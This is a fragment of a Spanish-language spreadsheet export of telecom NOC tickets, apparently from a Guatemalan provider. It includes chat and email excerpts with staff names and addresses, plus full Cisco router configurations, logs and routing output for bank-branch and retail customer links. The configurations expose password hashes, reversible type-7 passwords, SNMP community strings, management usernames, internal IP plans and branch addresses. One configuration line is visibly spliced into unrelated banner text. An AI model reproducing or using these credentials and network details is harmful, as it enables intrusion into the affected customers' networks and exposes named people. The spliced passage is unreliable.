DURACIÓN: 0:00:21
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 42154554
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/05/2022 10:17:26</t>
  </si>
  <si>
    <t>F4561848</t>
  </si>
  <si>
    <t>CLIENTE RESPONDE
BUENA NOCHE COMPAÑEROS, TENDRÁN INFORMACIÓN DE LA SUCURSAL CC_BANCO_AZTECA_GT_CHIQUIMULLLA_Z3/652900021T?
JORGE, 19:58
BUENAS NOCHES VEO QUE HAY CAIDAS EN SESION OSPF
 NEIGHBOR 192.168.137.161, INTERFACE ADDRESS 192.168.105.93
    IN THE AREA 0 VIA INTERFACE GIGABITETHERNET0/0.1792
    NEIGHBOR PRIORITY IS 1, STATE IS FULL, 12 STATE CHANGES
    DR IS 192.168.105.93 BDR IS 192.168.105.94
    OPTIONS IS 0X12 IN HELLO (E-BIT, L-BIT)
    OPTIONS IS 0X52 IN DBD (E-BIT, L-BIT, O-BIT)
    LLS OPTIONS IS 0X1 (LR)
    DEAD TIMER DUE IN 00:00:39
    NEIGHBOR IS UP FOR 00:00:40
    INDEX 1/1, RETRANSMISSION QUEUE LENGTH 0, NUMBER OF RETRANSMISSION 0
    FIRST 0X0(0)/0X0(0) NEXT 0X0(0)/0X0(0)
    LAST RETRANSMISSION SCAN LENGTH IS 0, MAXIMUM IS 0
    LAST RETRANSMISSION SCAN TIME IS 0 MSEC, MAXIMUM IS 0 MSEC
CC_BANCO_AZTECA_GT_CHIQUIMULLLA_Z3#
CC_BANCO_AZTECA_GT_CHIQUIMULLLA_Z3#
20:01
VAMOS A VALIDAR EL TEMA</t>
  </si>
  <si>
    <t>F4561855</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 13 DE MAYO DE 2022 11:25
PARA: ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;; HERNANDEZ VAZQUEZ EDGAR JESUS &lt;EHVAZQUE@UNINET.COM.MX&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002277118OC ::: TICKET CNOC IMSCI002748 ::: PACKET LOSS
*-*-*--*-*</t>
  </si>
  <si>
    <t>F4561857</t>
  </si>
  <si>
    <t>SE INFORMA ALARMA EN EL MONITOREO PROACTIVO
KENNY ROBERT RIVERA JUAREZ
JUE 12/05/2022 21:07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1857
ID: F4561857
IDENTIFICADOR DEL CLIENTE:  CC_DISTELSA_GT_3G_1A_CALLE_ZONA9
UBICADO EN:  50259784741_1A CALLE 7-66 ZONA 9GUATEMALA GUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4561905</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO EL ENLACE SE ENCUENTRA OPERATIVO  SE PORCEDE CON CIERRE .
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 5 MINUTOS)
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M6, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 19-MAR-14 11:56 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_GMG_GT_INTERNET_PETEN UPTIME IS 5 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "USBFLASH0:C1900-UNIVERSALK9-MZ.SPA.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178203
2 GIGABIT ETHERNET INTERFACES
3 TERMINAL LINES
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
2 CELLULAR INTERFACES
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
245744K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1921/K9          FTX18178203
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      SECURITYK9    PERMANENT      SECURITYK9
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_GMG_GT_INTERNET_PETEN#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3582 BYTES
!
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_GMG_GT_INTERNET_PETEN
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$QDCF$YQNGSWXSKSSCZTZ8.C7/C/
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
IP CEF
!
!
!
!
!
!
NO IPV6 CEF
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
LICENSE UDI PID CISCO1921/K9 SN FTX18178203
!
!
USERNAME GESTIONIP PASSWORD 7 0208210C1C561D2A08
!
REDUNDANCY
!
!
!
!
!
CONTROLLER CELLULAR 0/1
!
!
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.158.180 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/313900292T/_/
 BANDWIDTH 10240
 IP ADDRESS 10.174.141.58 255.255.255.248
 IP VIRTUAL-REASSEMBLY IN
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DE CLIENTE
 IP ADDRESS 190.56.115.253 255.255.255.252
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 10240000 1920000 3840000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE CELLULAR0/1/0
 NO IP ADDRESS
 ENCAPSULATION SLIP
!
INTERFACE CELLULAR0/1/1
 NO IP ADDRESS
 ENCAPSULATION SLIP
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.174.141.57
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION 2 CALLE EL CENTRO LOCAL FRENTE AL PARQUE SAYAXCHE PETEN
SNMP-SERVER ENABLE TRAPS ENTITY-SENSOR THRESHOLD
!
CONTROL-PLANE
!
!
BANNER LOGIN ^C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BANNER MOTD ^C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LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE 0/1/0 0/1/1
 NO EXEC
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
!
END
CC_GMG_GT_INTERNET_PETEN#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 31 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 31 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 34 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JAN  2 00:00:03.119: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
*JAN  2 00:00:03.311: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = SECURITYK9 AND LICENSE = SECURITYK9
*MAY 13 02:13:09.131: C3600_SCP_SET_DSTADDR2_IDB(184)ADD = 80 NAME IS EMBEDDED-SERVICE-ENGINE0/0
*MAY 13 02:13:31.171: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: INITIALIZED
*MAY 13 02:13:31.175: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: ENABLED
*MAY 13 02:13:32.123: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 13 02:13:32.123: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 13 02:13:33.123: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
*MAY 13 02:13:33.123: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 13 02:13:37.231: %CELLWAN-2-SIM_FAILURE: [CELLULAR0/1/0]: SIM READ FAILED
*MAY 13 02:13:37.303: %CELLWAN-2-MODEM_UP: MODEM IN HWIC SLOT 0/1 IS NOW UP
*MAY 13 02:13:37.311: %USBFLASH-5-CHANGE: USBFLASH0 HAS BEEN INSERTED!
*MAY 12 20:13:39.879 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 02:13:39 UTC FRI MAY 13 2022 TO 20:13:39 GUA THU MAY 12 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
*MAY 12 20:13:40.003 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 12 20:13:40.899 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 12 20:13:41.967 GUA: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 12 20:13:43.011 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*MAY 12 20:13:44.123 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(4)M6, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 19-MAR-14 11:56 BY PROD_REL_TEAM
*MAY 12 20:13:44.171 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_GMG_GT_INTERNET_PETEN IS UNDERGOING A COLD START
*MAY 12 20:13:44.851 GUA: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*MAY 12 20:13:44.851 GUA: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
*MAY 12 20:13:44.851 GUA: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*MAY 12 20:13:44.851 GUA: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
*MAY 12 20:13:45.791 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 12 20:13:46.791 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 12 20:13:51.123 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 12 20:13:52.123 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 12 20:15:03.123 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 12 20:15:04.123 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*MAY 12 20:15:08.123 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*MAY 12 20:15:09.123 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
CC_GMG_GT_INTERNET_PETEN#
SHOW CLOCK
*20:18:28.543 GUA THU MAY 12 2022
CC_GMG_GT_INTERNET_PETEN#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.141.57           0   084F.0AC8.68ED  ARPA   GIGABITETHERNET0/0
INTERNET  10.174.141.58           -   B838.611C.BAC0  ARPA   GIGABITETHERNET0/0
INTERNET  190.56.115.253          -   B838.611C.BAC1  ARPA   GIGABITETHERNET0/1
INTERNET  190.56.115.254          0   0C8D.DBAF.D716  ARPA   GIGABITETHERNET0/1
CC_GMG_GT_INTERNET_PETEN#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/313900292T/_/
GI0/1                          UP             UP       LAN DE CLIENTE
CE0/1/0                        DOWN           DOWN
CE0/1/1                        DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
CC_GMG_GT_INTERNET_PETEN#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.174.141.58   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         190.56.115.253  YES NVRAM  UP                    UP
CELLULAR0/1/0              UNASSIGNED      YES UNSET  DOWN                  DOWN
CELLULAR0/1/1              UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.212.158.180  YES NVRAM  UP                    UP
CC_GMG_GT_INTERNET_PETEN#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_DEPTAL 10.174.141.58
  PING 10.174.141.58: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.174.141.58 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.72
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_DEPTAL 10.174.141.58
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.174.141.58/32  DIRECT  0    0                 0.0.0.0         VLANIF2205</t>
  </si>
  <si>
    <t>F4561906</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVOM SE PORCEDE CON CIERRE DE TTK.
ROUTER CPE ACTIVO HACE 2 DÍAS.
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(4)M1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2011 BY CISCO SYSTEMS, INC.
COMPILED TUE 14-JUN-11 17:44 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M9, RELEASE SOFTWARE (FC1)
CC_BANRURAL_GT_AGENCIA_0591 UPTIME IS 2 DAYS, 3 HOURS, 34 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 23:47:08 UTC TUE MAY 10 2022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UZ
6 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX153983UZ
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0591#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 7043 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
VERSION 15.1
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0591
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$EZA5$FGB8G9T9H8FIT.A86A8DL1
ENABLE PASSWORD 7 0010160A034E0A
!
NO AAA NEW-MODEL
!
NO IPV6 CEF
IP SOURCE-ROUTE
IP CEF
!
!
!
!
!
NO IP DOMAIN LOOKUP
IP DOMAIN NAME YOURDOMAIN.COM
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-4094810339
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-4094810339
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-4094810339
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-4094810339
 CERTIFICATE SELF-SIGNED 01
  3082022B 30820194 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 34303934 38313033 3339301E 170D3134 30313039 32323438
  31395A17 0D323030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D34 30393438
  31303333 3930819F 300D0609 2A864886 F70D0101 01050003 818D0030 81890281
  8100E406 D09E3594 A1FE33E3 CB5E0E9B 66C4EC16 9E38EFF8 5C946D14 3AC1FB91
  8C9BF59C 7FF1F517 9F6587B7 AE391C76 A3A74258 B09CB2FC 6128AAB7 E3E8C1F5
  723672F3 E1DD549A 3A839A7A A5148F61 D77E2228 F1149F7B C9391117 8AC21145
  F404D952 B042DBF7 606E483F 6B694316 FA57A2FE 290C9299 13FF02E5 01C746A7
  A13D0203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF 301F0603
  551D2304 18301680 143287BF B4C3B576 276C6C08 9E5ACFC2 0D1A6629 BE301D06
  03551D0E 04160414 3287BFB4 C3B57627 6C6C089E 5ACFC20D 1A6629BE 300D0609
  2A864886 F70D0101 05050003 81810097 AAD41B39 53B823CF 8C6DA589 BA1708DB
  A27FCADD 0AFF7DC2 AE654527 371B9195 62F42FEB 4913FF94 78715C27 6BB7EFE5
  C034E76D AEAB8462 949AB0E3 A8DC62ED C4AE84C2 B5D8BB28 05097D18 2613A6CD
  472B9793 B79C12BF 1BFC1823 E3BF41E0 AA1840F4 907CC53F 34520E7D 018332DF
  2DED989A 65C21426 0228BA6C 385576
  	QUIT
LICENSE UDI PID CISCO1941/K9 SN FTX153983UZ
!
!
VTP MODE TRANSPARENT
USERNAME GESTIONIP SECRET 5 $1$GNVL$TL4AG6BVN8AE9YYUU1ZQP/
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.120.194 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/8901167T/_/
 BANDWIDTH 4096
 NO IP ADDRESS
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
 NO CDP ENABLE
!
INTERFACE GIGABITETHERNET0/0.1
 DESCRIPTION WAN PRINCIPAL/_/8901167T/_/
 BANDWIDTH 4096
 ENCAPSULATION DOT1Q 184
 IP ADDRESS 10.72.190.60 255.255.255.192
 RATE-LIMIT INPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 NO CDP ENABLE
!
INTERFACE GIGABITETHERNET0/1
 NO IP ADDRESS
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1.2249
 DESCRIPTION WAN REDUNDANTE/_/8901680T/_/
 BANDWIDTH 2048
 ENCAPSULATION DOT1Q 2249
 IP ADDRESS 10.72.190.133 255.255.255.128
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION CONTINUE EXCEED-ACTION DROP
!
INTERFACE GIGABITETHERNET0/0/0
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/1
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/2
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/0/3
 NO IP ADDRESS
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.135.91.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.165.91.126 255.255.255.0
 LOAD-INTERVAL 30
!
ROUTER OSPF 1
 ROUTER-ID 10.72.190.60
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.72.190.0 0.0.0.63 AREA 164
 NEIGHBOR 10.72.190.1
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
IP HTTP ACCESS-CLASS 23
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP HTTP TIMEOUT-POLICY IDLE 60 LIFE 86400 REQUESTS 10000
!
IP ROUTE 0.0.0.0 0.0.0.0 10.72.190.129 225 NAME REDUNDANTE_WIMAX
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.168.53.0/24
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.212.120.194/32
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 10.165.91.0/24
IP PREFIX-LIST CONNECTED SEQ 20 PERMIT 10.135.91.16/29
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 23 PERMIT 10.10.10.0 0.0.0.7
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
ROUTE-MAP CONNECTED PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONNEND IT PROVIDES THE DEFAULT USERNAME "CISCO" FOR ONE-TIME USE. IF YOU HAVE CONNECTED
!
!
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION LINEA C 10 LA MAQUINA CALLE PRINCIPAL SUCHITEPEQIEZ CUYOTEN
!
CONTROL-PLANE
!
!
BANNER EXEC ^CC
% PASSWORD EXPIRATION WARNING.
-----------------------------------------------------------------------
CISCO CONFIGURATION PROFESSIONAL (CISCO CP) IS INSTALLED ON THIS DEVICE
AND IT PROVIDES THE DEFAULT USERNAME "CISCO" FOR  ONE-TIME USE. IF YOU HAVE
ALREADY USED THE USERNAME "CISCO" TO LOGIN TO THE ROUTER AND YOUR IOS IMAGE
SUPPORTS THE "ONE-TIME" USER OPTION, THEN THIS USERNAME HAS ALREADY EXPIRED.
YOU WILL NOT BE ABLE TO LOGIN TO THE ROUTER WITH THIS USERNAME AFTER YOU EXIT
THIS SESSION.
IT IS STRONGLY SUGGESTED THAT YOU CREATE A NEW USERNAME WITH A PRIVILEGE LEVEL
OF 15 USING THE FOLLOWING COMMAND.
USERNAME &lt;MYUSER&gt; PRIVILEGE 15 SECRET 0 &lt;MYPASSWORD&gt;
REPLACE &lt;MYUSER&gt; AND &lt;MYPASSWORD&gt; WITH THE USERNAME AND PASSWORD YOU WANT TO
USE.
-----------------------------------------------------------------------
^C
BANNER LOGIN ^CC-----------------------------------------------------------------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INPUT ALL
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE VTY 0 4
 PRIVILEGE LEVEL 15
 LOGIN LOCAL
 TRANSPORT INPUT ALL
 TRANSPORT OUTPUT ALL
LINE VTY 5 15
 ACCESS-CLASS 23 IN
 PRIVILEGE LEVEL 15
 LOGIN LOCAL
 TRANSPORT INPUT TELNET SSH
 TRANSPORT OUTPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
END
CC_BANRURAL_GT_AGENCIA_0591#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 105 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 105 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 109 MESSAGE LINES LOGGED
LOG BUFFER (8192 BYTES):
 PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/0.1 FROM LOADING TO FULL, LOADING DONE
